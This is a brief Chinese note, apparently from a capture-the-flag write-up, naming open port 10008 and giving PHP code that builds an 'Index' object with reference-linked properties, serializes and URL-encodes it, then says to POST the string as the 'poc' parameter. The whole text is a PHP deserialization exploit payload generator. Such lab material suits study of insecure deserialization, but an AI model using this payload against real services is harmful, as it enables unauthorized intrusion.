- 开放端口: 10008
<?php
class Index{
private $name1;
private $name2;
protected $age1;
protected $age2;
function __construct(){
$this->name1 = &$this->name2;
$this->age1 = &$this->age2;
}
}
$a = new Index();
echo urlencode(serialize($a));
生成的序列化字符串post传入poc参数即可